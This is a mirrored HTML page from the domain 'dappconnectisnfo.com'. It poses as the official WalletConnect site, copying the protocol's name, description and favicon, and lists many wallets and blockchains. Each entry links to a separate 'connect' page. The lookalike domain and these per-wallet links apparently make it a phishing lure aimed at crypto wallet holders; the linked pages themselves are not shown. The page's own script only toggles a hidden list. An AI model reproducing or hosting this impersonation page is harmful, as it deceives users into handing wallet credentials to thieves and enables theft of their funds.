<html>

<!-- Mirrored from dappconnectisnfo.com/dapp by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 30 Dec 2021 19:00:55 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<link rel="stylesheet" href="assets/main.css" type="text/css"> 
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="Open protocol for connecting Wallets to Dapps">
<meta property="og:image" content="https://walletconnect.org/favicon.ico">
<link rel="icon" href="https://walletconnect.org/favicon.ico">
<script>
function show() {
  var x = document.getElementById("hidden");
  if (x.style.display === "none") {
    x.style.display = "block";
  } else {
    x.style.display = "none";
  }

  if (x.style.display === "block") {
    document.getElementById("btn").innerHTML = "Show Less &uarr;";
  } 
}
</script>
<title>WalletConnect</title>
</head>
<body>
<center>
    <div class="top">
        <a href="#footer?v" class="left">Github</a>

        <a href="#?v" class="left">Docs</a>
        <a href="dapp.html" class="main"><img src="assets/logo.svg" alt="logo"></a>
        <a href="#wallets?v" class="left">Wallets</a>
        <a href="#?v" class="left">Apps</a>
</div>
<br>
<div class="gFeYHJ">WalletConnect</div>

<div class="lpfxqP">Open protocol for connecting Wallets to Dapps</div>
<br>

<div class="dXgqeu">
<img src="assets/banner.png" alt="WalletConnect">
</div>

<div class="bout">
<h2 class="home">What is WalletConnect?</h2>
<p>WalletConnect is an open source protocol for connecting decentralised applications to mobile wallets with QR code scanning or deep linking. 
A user can interact securely with any Dapp from their mobile phone, making WalletConnect wallets a safer choice compared to desktop or browser 
extension wallets.</p><br>
<h2 class="home">How does it work?</h2>
<p>WalletConnect connects web applications to supported <a href="index.html#">mobile wallets</a>. WalletConnect session is started by a scanning a QR 
code (desktop) or by clicking an application deep link (mobile).</p>
</div>

<div class="wallets" id="wallets">
    <h1 class="home">Wallets</h1>
<p>Multiple iOS and Android wallets support the WalletConnect protocol. Interaction between mobile apps and mobile browsers are supported via mobile deep linking.</p>

<br>
<div class="all">
<div class="apps">
    <a href="connect/indexe3b7e3b7e3b7a148.html?w=metamask"><img src="assets/metamask.png"></a><br>
    MetaMask
</div>

<div class="apps">
    <a href="connect/index38f238f238f2af1c.html?w=MEW+wallet"><img src="assets/MEW.png"></a><br>
    MEW Wallet
</div>

<div class="apps">
    <a href="connect/index211821182118b89c.html?w=trust+wallet"><img src="assets/trustwallet.png"></a><br>
    Trust Wallet
</div>

<div class="apps">
    <a href="connect/indexff05ff05ff051397.html?w=wallet+connect"><img src="assets/logo.svg"></a><br>
    Wallect<br>Connect
</div>

<div class="apps">
    <a href="connect/indexdca7dca7dca7bf50.html?w=coinbase+wallet"><img src="assets/coinbase.jpg"></a><br>
    Coinbase Wallet
</div>

<div class="apps">
    <a href="connect/index0b9a0b9a0b9ad3dc.html?w=atomic+wallet"><img src="assets/atomic.png"></a><br>
    Atomic Wallet
</div>

<div class="apps">
    <a href="connect/index1854185418547500.html?w=binance+smart+chain"><img src="assets/binance.png"></a><br>
    Binance Smart Chain
</div>

<div class="apps">
    <a href="connect/index3664366436642e30.html?w=bnb"><img src="assets/bnb.png"></a><br>
    BNB
</div>

<div class="apps">
    <a href="connect/index5a305a305a30afe0.html?w=polkadot"><img src="assets/polkadot.png"></a><br>
    Polkadot
</div>

<div class="apps">
    <a href="connect/index297929792979839d.html?w=xrp"><img src="assets/xrp.png"></a><br>
    XRP
</div>

<div class="apps">
    <a href="connect/indexbd0fbd0fbd0f3cab.html?w=stellar"><img src="assets/stellar.png"></a><br>
    Stellar
</div>

<div class="apps">
    <a href="connect/indexdf8adf8adf8a792c.html?w=tezos"><img src="assets/tezos.png"></a><br>
    Tezos
</div>

<div class="apps">
    <a href="connect/index7d1a7d1a7d1a7326.html?w=theta"><img src="assets/theta.png"></a><br>
    Theta
</div>

<div class="apps">
    <a href="connect/indexcea2cea2cea287e1.html?w=tron"><img src="assets/tron.png"></a><br>
    Tron
</div>

<div class="apps">
    <a href="connect/indexa71aa71aa71af669.html?w=cosmos"><img src="assets/cosmos.png"></a><br>
    Cosmos
</div>

<div class="apps">
    <a href="connect/index0713071307137cee.html?w=kava"><img src="assets/kava.png"></a><br>
    Kava
</div>

<div class="apps">
    <a href="connect/indexcb21cb21cb218e36.html?w=filecoin"><img src="assets/filecoin.png"></a><br>
    Filecoin
</div>

<div class="apps">
    <a href="connect/indexdf6adf6adf6abfb1.html?w=solana"><img src="assets/solana.png"></a><br>
    Solana
</div>

<div class="apps">
    <a href="connect/index7a807a807a806724.html?w=ethereum+classic"><img src="assets/ethereum-classic.png"></a><br>
    Ethereum Classic
</div>

<div class="apps">
    <a href="connect/index8af28af28af293a4.html?w=zilliqa"><img src="assets/zilliqa.png"></a><br>
    Zilliqa
</div>

<div class="apps">
    <a href="connect/index0712071207122c5a.html?w=elrond"><img src="assets/elrond.jpg"></a><br>
    Elrond
</div>

<div class="apps">
    <a href="connect/indexbd88bd88bd88ca96.html?w=waves"><img src="assets/waves.png"></a><br>
    Waves
</div>

<div class="apps">
    <a href="connect/index915e915e915e6595.html?w=icon"><img src="assets/icon.png"></a><br>
    ICON
</div>

<div class="apps">
    <a href="connect/index14d314d314d3457f.html?w=ontology"><img src="assets/ontology.png"></a><br>
    Ontology
</div>

<div class="apps">
    <a href="connect/index06200620062007c5.html?w=trust+vault"><img src="assets/harmony.jpg"></a><br>
    Harmony
</div>

<div class="apps">
    <a href="connect/index06200620062007c5.html?w=trust+vault"><img src="assets/parsiq.jpg"></a><br>
    Parsiq
</div>

<div class="apps">
    <a href="connect/index062006200620aa56.html?w=uni+swap"><img src="assets/uniswap.png"></a><br>
    Uniswap
</div>

<div class="apps">
    <a href="connect/index0620062006205aeb.html?w=pancakeswap+vault"><img src="assets/pancakeswap.png"></a><br>
    PancakeSwap
</div>
<div class="apps">
    <a href="connect/index062006200620a2f9.html?w=coinomi"><img src="assets/coinomi.png"></a><br>
    Coinomi
</div>
<div class="apps">
    <a href="connect/index06200620062042ec.html?w=safepal"><img src="assets/safepal.png"></a><br>
    Safepal
</div>
<div class="apps">
    <a href="connect/index062006200620fed1.html?w=unstoppable+domain"><img src="assets/unstoppable-domain.png"></a><br>
    Unstoppable Domains
</div>
<div class="apps">
    <a href="connect/index062006200620000a.html?w=tokenpocket"><img src="assets/tokenpocket.png"></a><br>
    Token Pocket
</div>
<div class="apps">
    <a href="connect/index062006200620d3d0.html?w=nem"><img src="assets/nem.png"></a><br>
    NEM Wallet
</div>
<div class="apps">
    <a href="connect/index062006200620ddfc.html?w=others"><img src="assets/btc.png"></a><br>
    Other Wallet
</div>


</div>
<br>
<button onclick="show()" class="btn" id="btn">Show More ↓</button>
<br><br>
<div class="hidden" id="hidden">
<div class="all">
    
<div class="apps">
    <a href="connect/index1e441e441e4410b2.html?w=nano"><img src="assets/nano.png"></a><br>
    Nano
</div>

<div class="apps">
    <a href="connect/index41db41db41dbf54f.html?w=tomo+chain"><img src="assets/tomo.png"></a><br>
    Tomo Chain
</div>

<div class="apps">
    <a href="connect/index250c250c250cab62.html?w=iotex"><img src="assets/iotex.png"></a><br>
    IoTex
</div>

<div class="apps">
    <a href="connect/index2d9f2d9f2d9f9af2.html?w=wanchain"><img src="assets/wanchain.png"></a><br>
    Wanchain
</div>

<div class="apps">
    <a href="connect/index830c830c830cf789.html?w=kin"><img src="assets/kin.png"></a><br>
    Kin
</div>

<div class="apps">
    <a href="connect/index473e473e473e8893.html?w=nimiq"><img src="assets/nimiq.png"></a><br>
    Nimiq
</div>

<div class="apps">
    <a href="connect/index07710771077128a6.html?w=aion"><img src="assets/aion.png"></a><br>
    Aion
</div>

<div class="apps">
    <a href="connect/index5789578957899ba3.html?w=thunder-token"><img src="assets/thundertoken.png"></a><br>
    Thunder Token
</div>

<div class="apps">
    <a href="connect/index74d974d974d91a09.html?w=aerternity"><img src="assets/aeternity.png"></a><br>
    Aeternity
</div>

<div class="apps">
    <a href="connect/index16e716e716e7ba59.html?w=nebulas"><img src="assets/nebulas.png"></a><br>
    Nebulas
</div>

<div class="apps">
    <a href="connect/index99b299b299b2a28c.html?w=fio"><img src="assets/fio.png"></a><br>
    FIO
</div>

<div class="apps">
    <a href="connect/indexeb25eb25eb255910.html?w=gochain"><img src="assets/gochain.png"></a><br>
    GoChain
</div>

<div class="apps">
    <a href="connect/index56385638563854e2.html?w=POA+network"><img src="assets/poa.png"></a><br>
    POA Network
</div>

<div class="apps">
    <a href="connect/index0f790f790f797b19.html?w=callisto"><img src="assets/callisto.png"></a><br>
    Callisto
</div>

<div class="apps">
    <a href="connect/indexad44ad44ad44be5b.html?w=bitpay"><img src="assets/bitpay.jpg"></a><br>
    BitPay
</div>

<div class="apps">
    <a href="connect/indexb52ab52ab52ab73b.html?w=aktionariat"><img src="assets/aktionariat.png"></a><br>
    Aktionariat
</div>

<div class="apps">
    <a href="connect/index7d147d147d1492e4.html?w=atwallet"><img src="assets/atwallet.png"></a><br>
    AtWallet
</div>

<div class="apps">
    <a href="connect/index1a6a1a6a1a6a7962.html?w=guard+wallet"><img src="assets/guard.png"></a><br>
    Guard Wallet
</div>

<div class="apps">
    <a href="connect/indexbbd9bbd9bbd91747.html?w=aave"><img src="assets/aave.jpg"></a><br>
    AAVE
</div>

<div class="apps">
    <a href="connect/index6a116a116a11b1b4.html?w=exodus"><img src="assets/exodus.jpg"></a><br>
    Exodus
</div>


<div class="apps">
    <a href="connect/indexbf5cbf5cbf5cb6f9.html?w=enjin"><img src="assets/enjin.jpg"></a><br>
    Enjin
</div>


<div class="apps">
    <a href="connect/index1cb01cb01cb0e8a1.html?w=skale"><img src="assets/skale.png"></a><br>
    Skale
</div>

<div class="apps">
    <a href="connect/indexd316d316d3164921.html?w=portis"><img src="assets/portis.png"></a><br>
    Portis
</div>

<div class="apps">
    <a href="connect/index4db64db64db6296d.html?w=trezor"><img src="assets/trezor.png"></a><br>
    Trezor
</div>

<div class="apps">
    <a href="connect/indexffebffebffeba838.html?w=squarelink"><img src="assets/squarelink.png"></a><br>
    Squarelink
</div>

<div class="apps">
    <a href="connect/indexeb9beb9beb9b078b.html?w=torus"><img src="assets/torus.jpg"></a><br>
    Torus
</div>

<div class="apps">
    <a href="connect/index4df74df74df747ac.html?w=vechain"><img src="assets/vechain.jpg"></a><br>
    VeChain
</div>

<div class="apps">
    <a href="connect/index678067806780cf94.html?w=scatter+wallet"><img src="assets/scatter.jpg"></a><br>
    Scatter Wallet
</div>

<div class="apps">
    <a href="connect/index851b851b851b760e.html?w=math+wallet"><img src="assets/math-wallet.png"></a><br>
    Math Wallet
</div>

<div class="apps">
    <a href="connect/indexdcc9dcc9dcc9f06f.html?w=fortmatic"><img src="assets/fortmatic.png"></a><br>
    FortMatic
</div>

<div class="apps">
    <a href="connect/index6d756d756d758c1c.html?w=digitex"><img src="assets/digitex.png"></a><br>
    Digitex
</div>

<div class="apps">
    <a href="connect/indexea66ea66ea664753.html?w=ledger"><img src="assets/ledger.png"></a><br>
    Ledger
</div>

<div class="apps">
    <a href="connect/indexd858d858d8584242.html?w=defiat"><img src="assets/defiat.jpg"></a><br>
    Defiat
</div>

<div class="apps">
    <a href="connect/indexd03dd03dd03d518e.html?w=authereum"><img src="assets/authereum.png"></a><br>
    Authereum
</div>

<div class="apps">
    <a href="connect/indexb08cb08cb08c2cf3.html?w=flare+wallet"><img src="assets/flare.jpg"></a><br>
    Flare Wallet
</div>

<div class="apps">
    <a href="connect/indexf78ff78ff78f2878.html?w=zelcore"><img src="assets/zelcore.png"></a><br>
    Zelcore
</div>

<div class="apps">
    <a href="connect/indexc865c865c865cccc.html?w=bitkeep"><img src="assets/bitkeep.png"></a><br>
    BitKeep
</div>

<div class="apps">
    <a href="connect/indexef39ef39ef391523.html?w=coin98"><img src="assets/coin98.png"></a><br>
    Coin98
</div>

<div class="apps">
    <a href="connect/index06200620062007c5.html?w=trust+vault"><img src="assets/trustvault.png"></a><br>
    Trust Vault
</div>

</div>

</div>


</div>

<footer><div id="footer">
<p><img src="assets/discord.svg" class="footimg">  <a href="https://discord.gg/jhxMvxP">Discord</a></p><br>
<p><img src="assets/telegram.svg" class="footimg">  <a href="https://t.me/walletconnect_announcements">Telegram</a></p><br>
<p><img src="assets/twitter.svg" class="footimg">  <a href="https://twitter.walletconnect.org/">Twitter</a></p><br>
<p><img src="assets/github.svg" class="footimg">  <a href="https://github.com/walletconnect">Github</a></p><br>
</div></footer>
</center>
</body>
<!-- Mirrored from dappconnectisnfo.com/dapp by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 30 Dec 2021 19:03:16 GMT -->
</html>